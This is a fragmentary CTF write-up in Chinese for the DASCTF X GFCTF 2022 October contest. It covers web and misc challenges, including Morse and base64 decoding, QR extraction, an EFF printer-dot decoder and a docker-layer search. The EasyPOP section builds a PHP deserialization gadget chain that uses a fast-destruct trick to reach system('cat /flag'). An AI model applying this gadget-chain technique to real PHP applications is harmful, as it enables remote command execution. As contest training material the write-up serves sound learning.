
  • WEB
  • EasyPOP
  • MISC
  • 滴滴图
  • ez_xxd
  • poi?qoi!
  • easy_dots
  • dockermisc



Fast Destruct优先一步__wakeup()执行析构函数

fine::__invoke() <- sorry::__get() <- secret_code::show() <- secret_code::__call() <- show::__toString() <- sorry::__destruct()
class fine{
    private $cmd;
    private $content;
    public function __construct(){
        $this->cmd = "system";
        $this->content = "cat /flag";

class show{
    public $ctf;
    public $time;

class sorry{
    private $name;
    private $password;
    public $hint;
    public $key;
    // public function __construct(){
    //     $this->name = "mochu7";
    //     $this->password = &$this->name;
    // }

class secret_code{
    protected $code;
    public function __construct($obj){
    	$this->code = $obj;

$fine = new fine();
$show = new show();
$sorry1 = new sorry();
$sorry2 = new sorry();

$sorry2->key = $fine;
$secret_code = new secret_code($sorry2);
$show->ctf = $secret_code;
$sorry1->hint = $show;
$payload = serialize($sorry1);
$payload = str_replace('s:3:"key";N;}', 's:3:"key";N;', $payload);
echo urlencode($payload);

DASCTF X GFCTF 2022十月挑战赛 Writeup_HTTP




DASCTF X GFCTF 2022十月挑战赛 Writeup_GFCTF2022_02


DASCTF X GFCTF 2022十月挑战赛 Writeup_GFCTF2022_03


DASCTF X GFCTF 2022十月挑战赛 Writeup_GFCTF2022_04


--... ....- -.... ..-. ..... ..-. -.... ..--- -.... ..... ..... ..-. -.... ...-- --... ....- -.... -.... -.... ..... --... ..---

-... -- ----. ..-. -... -- ----. ..-. -... -- ----. ..-. -... -- ----. ..-. -... -- ----. ..-. -... -- ----. ..-. -... -- ---.. .-.-.



DASCTF X GFCTF 2022十月挑战赛 Writeup_DASCTF2022十月挑战赛_05


DASCTF X GFCTF 2022十月挑战赛 Writeup_HTTP_06


from base64 import *

bytedata = ''
with open('flag.txt', 'r') as f:
	lines = f.readlines()
	for line in lines:
		bytedata += b64decode(line.strip()).decode()
bytedata = bytedata.replace("\n", '')
with open('Miku.png', 'wb') as f1:


DASCTF X GFCTF 2022十月挑战赛 Writeup_DASCTF2022十月挑战赛_07


DASCTF X GFCTF 2022十月挑战赛 Writeup_压缩包_08

DASCTF X GFCTF 2022十月挑战赛 Writeup_GNU_09


DASCTF X GFCTF 2022十月挑战赛 Writeup_压缩包_10

DASCTF X GFCTF 2022十月挑战赛 Writeup_GFCTF2022_11

DASCTF X GFCTF 2022十月挑战赛 Writeup_GFCTF2022_12


DASCTF X GFCTF 2022十月挑战赛 Writeup_GFCTF2022_13







DASCTF X GFCTF 2022十月挑战赛 Writeup_GNU_14

QOI -> PNGhttps://www.aconvert.com/image/qoi-to-png/

直接扫描是假的flag,将图片保存下来,在Gray bits发现另外一张二维码,扫描得到flag

DASCTF X GFCTF 2022十月挑战赛 Writeup_GFCTF2022_15




#!/usr/bin/env python

# docucolor.cgi -- CGI script to interpret Xerox DocuColor forensic dot pattern
# Copyright (C) 2005 Electronic Frontier Foundation
# This program is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License
# as published by the Free Software Foundation; either version 2
# of the License, or (at your option) any later version.
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# GNU General Public License for more details.
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA  02110-1301, USA
# Xerox Corporation has no connection with this program and does not
# warrant its correctness.
# This program is the result of research by Robert Lee, Seth Schoen, Patrick
# Murphy, Joel Alwen, and Andrew "bunnie" Huang.  For more information, see
# http://www.eff.org/Privacy/printers

import cgi, os, sys
import cgitb; cgitb.enable()
dots = {(1, 0): 0, (1, 1): 1, (1, 2): 0, (1, 3): 0, (1, 4): 1, (1, 5): 0, (1, 6): 0, (1, 7): 1, (2, 0): 0, (2, 1): 1, (2, 2): 1, (2, 3): 0, (2, 4): 0, (2, 5): 0, (2, 6): 0, (2, 7): 1, (3, 0): 0, (3, 1): 0, (3, 2): 0, (3, 3): 0, (3, 4): 0, (3, 5): 0, (3, 6): 0, (3, 7): 1, (4, 0): 0, (4, 1): 0, (4, 2): 0, (4, 3): 0, (4, 4): 0, (4, 5): 0, (4, 6): 0, (4, 7): 1, (5, 0): 0, (5, 1): 1, (5, 2): 1, (5, 3): 0, (5, 4): 0, (5, 5): 0, (5, 6): 0, (5, 7): 1, (6, 0): 0, (6, 1): 0, (6, 2): 1, (6, 3): 1, (6, 4): 1, (6, 5): 0, (6, 6): 0, (6, 7): 0, (7, 0): 0, (7, 1): 0, (7, 2): 1, (7, 3): 1, (7, 4): 0, (7, 5): 0, (7, 6): 0, (7, 7): 1, (8, 0): 0, (8, 1): 1, (8, 2): 0, (8, 3): 0, (8, 4): 0, (8, 5): 0, (8, 6): 0, (8, 7): 0, (9, 0): 0, (9, 1): 1, (9, 2): 0, (9, 3): 0, (9, 4): 0, (9, 5): 0, (9, 6): 0, (9, 7): 0, (10, 0): 0, (10, 1): 1, (10, 2): 0, (10, 3): 1, (10, 4): 0, (10, 5): 0, (10, 6): 0, (10, 7): 1, (11, 0): 0, (11, 1): 0, (11, 2): 1, (11, 3): 0, (11, 4): 1, (11, 5): 0, (11, 6): 0, (11, 7): 1, (12, 0): 1, (12, 1): 1, (12, 2): 0, (12, 3): 1, (12, 4): 0, (12, 5): 0, (12, 6): 1, (12, 7): 1, (13, 0): 0, (13, 1): 1, (13, 2): 1, (13, 3): 0, (13, 4): 0, (13, 5): 0, (13, 6): 0, (13, 7): 1, (14, 0): 0, (14, 1): 0, (14, 2): 0, (14, 3): 1, (14, 4): 0, (14, 5): 0, (14, 6): 0, (14, 7): 0, (15, 0): 0, (15, 1): 1, (15, 2): 1, (15, 3): 0, (15, 4): 0, (15, 5): 1, (15, 6): 0, (15, 7): 0}

print "Content-type: text/html"
form = cgi.FieldStorage()
print """<html><head>
<title>DocuColor pattern interpretation</title>
<h2>DocuColor pattern interpretation</h2>
<hr />"""

def print_matrix():
    # Print the matrix of dots on standard output.
    print "<pre>"
    print "           111111"
    print "  123456789012345"
    for y in range(7, -1, -1):
        line = ""
        for x in range(1, 16):
            if dots[(x,y)]: line = line + "o"
            else: line = line + " "
        print y, line
    print "</pre>"

def column_value(col):
    # Extract and decode the value of the indicated column.
    total = 0
    for y in range(6, -1, -1):
        total = total + dots[(col, y)] * 2**y
    return total

def footer():
    if os.environ.has_key("HTTP_REFERER"):
        r = os.environ["HTTP_REFERER"]
        if r:
            print '<p><a href="%s">Back to referring page</a></p>' % r
        print "</body></html>"

# Step 1: display disclaimer and output
print "<p>This is an interpretation of the following dot pattern:</p>"


print """<p>This interpretation is based on reverse engineering, and may not
be complete or current for every DocuColor model version.  Xerox
Corporation has no connection with this program, and does not warrant
its correctness.</p><hr />"""

if not 1 in dots.values():
    print "<p>This pattern is <strong>empty</strong> and cannot be interpreted.</p>"

# Step 2: verify row parity
bad_rows = []

# don't check row 7 because it is expected to have even parity
for row in range(6, -1, -1):
    p = 0
    for col in range(1, 16):
        p = (p + dots[(col, row)]) % 2
    if p == 0:
        print "Parity mismatch for row %i.<br />" % row
        bad_rows = bad_rows + [row]

# Step 3: verify column parity
bad_cols = []
for col in range(1, 16):
    p = 0
    for row in range(7, -1, -1):
        p = (p + dots[(col, row)]) % 2
    if p == 0:
        print "Parity mismatch for column %i.<br />" % col
        bad_cols = bad_cols + [col]

# Step 4: try to correct input errors
correction = 0
if bad_rows or bad_cols:
    if len(bad_cols) == 1 and len(bad_rows) == 0:
        # error in column parity row!
        # We could be more stringent about this by also verifying the
        # row 7 has even parity, but the case that's affected by this
        # is extraordinarily rare (under bizarre circumstances, we
        # incorrectly conclude that an uncorrectable error is
        # correctable).
        print "Correctable error in row 7 (column parity) at column", bad_cols[0]
        dots[(bad_cols[0], 7)] = not dots[(bad_cols[0], 7)]
        correction = 1
    if len(bad_cols) == 1 and len(bad_rows) == 1:
        # correctable error (single row error, single column error)
        print "Correctable error at row", bad_rows[0], "and col", bad_cols[0]
        dots[(bad_cols[0], bad_rows[0])] = not dots[(bad_cols[0], bad_rows[0])]
        correction = 1
    if len(bad_cols) > 1 or len(bad_rows) > 1:
        # multiple rows or multiple columns in error
        print "Errors could not be corrected!  Using erroneous matrix."
    if len(bad_cols) > 3 or len(bad_rows) > 3:
        print "<p><strong>There are numerous errors here; you probably"
        print "did not enter a genuine DocuColor matrix, or used a"
        print "matrix we don't know how to decode.  The content of"
        print "this interpretation is unlikely to be"
        print "meaningful.</strong></p>"
    print "<br>"
    print "Row and column parity verified correctly."

if correction:
    print "<p>Making correction and processing corrected matrix:</p>"
    print "<hr />"

# Step 5: decode serial number (with and without column 14)

print "<p>Printer serial number: %02i%02i%02i [or %02i%02i%02i%02i]</p>" % (tuple(map(column_value, (13, 12, 11))) + tuple(map(column_value, (14, 13, 12, 11))))

# Step 6: decode date and time

# Year: guessing about Y2K, for lack of any relevant evidence
year = column_value(8)
if year < 70 or year > 99:
    year = year + 2000
    year = year + 1900

# Month
month_names = ["(no month specified)", "January", "February", "March", "April", "May", "June", "July", "August", "September", "October", "November", "December"]
    month = month_names[column_value(7)]
except IndexError:
    month = "(<strong>invalid</strong> month %i)" % column_value(8)

# Day
day = column_value(6)
if day == 0:
    day = "(no day specified)"
elif day > 31:
    day = "(<strong>invalid</strong> day %i)" % day

print "<p>Date: %s %s, %s</p>" % (str(month), str(day), str(year))

hour = column_value(5)
minute = column_value(2)

print "<p>Time: %02i:%02i</p>" % (hour, minute)

# Step 7: decode unknown column 15

print "<p>"
print "Column 15 value: %i" % column_value(15)

PS C:\Users\Administrator\Downloads> python2 .\docucolor.py
Content-type: text/html

<title>DocuColor pattern interpretation</title>
<h2>DocuColor pattern interpretation</h2>
<hr />
<p>This is an interpretation of the following dot pattern:</p>
7 ooooo o  oooo
6            o
5               o
4 o    o    o
3      oo  o o o
2  o  ooo   o o o
1 oo  o  ooo oo o
0            o
<p>This interpretation is based on reverse engineering, and may not
be complete or current for every DocuColor model version.  Xerox
Corporation has no connection with this program, and does not warrant
its correctness.</p><hr />
Row and column parity verified correctly.
<p>Printer serial number: 067520 [or 08067520]</p>
<p>Date: December 28, 2002</p>
<p>Time: 06:06</p>
Column 15 value: 38
>>> import hashlib
>>> 'DASCTF{{{}}}'.format(hashlib.md5('08067520-2002-12-28-06:06'.encode()).hexdigest())



root@mochu7-pc:/mnt/d/BaiduNetdiskDownload/dockermisc# for tarfile in ./*/layer.tar; do tar xvf $tarfile; done
root@mochu7-pc:/mnt/d/BaiduNetdiskDownload/dockermisc# ls
18f57da08a2f1cb2be7695ea744a5e775866459f3a5d218920f72de57c45f158  8ead9390cf58102a9b80d22decbbba5dce833347cf948f892fa73301dd11e126       ffce00d2617c9f504ea76a7742792b1fa2e0839ff408505035cec6b8ef721195  run
1c4a9be5404c49ea385e3df0ad01fcb64e779de4164cb3f2970a0d2d23b2aa2c  980eb8f2bed1b1ce3b0643c97bbb501e08ba301916e56ecdc30f38a34c6ebbdd       flag.sh                                                           sbin
39102658431794d0047ae028b27dbdf6aa029c1761ba68472eaab630d3de006b  a7b2574e8367749b2d5ada51770a9bc2bbe1282f96860ee3b59c992cec37517a       home                                                              srv
3d8f4003d61535236973e0c8c82ed748b770557dad63877584fdd0d238d06714  bin                                                                    lib                                                               sys
4ba1fbeb418c6c1aa7295511ffb99262bdca8071026683fca3da3802f3e0e298  d46b5db75a2d0c57195460f7c6954743d8e225d4d195e229879b9518ecc2ddc1       manifest.json                                                     tmp
4ec31032db8fd51a84019b9063953c0c253e62657d8e1c60257bbf7543035669  d588e3cc5a1a219c72f12412fca348036ef430b4e3c21e866910797b910eab7c       media                                                             usr
51c8e12dc35eaedc625fe33298db7cb7ff2d33b8c7454a8ac7722be47e802e73  d84bd86396bb67cd474a6160717e59762705bef50ceaf17f1f018f30fccc841d       mnt                                                               var
529c1ebc6bd9c7d9d0492679d03beac7c0675fe15c2c33e4abb669801eed25e5  dev                                                                    proc
6eb9cd1558fabb287e6c8fa3e7c375e16d18dc1307220bf852e85033232898cf  e47fbf9c779849b8842d901b2dc4be592e182a97aae382d4dd47dc9923a08e79.json  repositories
8c5d85c28de5d484f1468b2e9c08b4e47dd529e93794cae0f7fbe223bc4a09c0  etc                                                                    root
root@mochu7-pc:/mnt/d/BaiduNetdiskDownload/dockermisc# find ./* -name '*flag*'


DASCTF X GFCTF 2022十月挑战赛 Writeup_HTTP_16

DASCTF X GFCTF 2022十月挑战赛 Writeup_GNU_17


DASCTF X GFCTF 2022十月挑战赛 Writeup_压缩包_18


DASCTF X GFCTF 2022十月挑战赛 Writeup_GNU_19


DASCTF X GFCTF 2022十月挑战赛 Writeup_GNU_20




DASCTF X GFCTF 2022十月挑战赛 Writeup_GFCTF2022_21


DASCTF X GFCTF 2022十月挑战赛 Writeup_HTTP_22
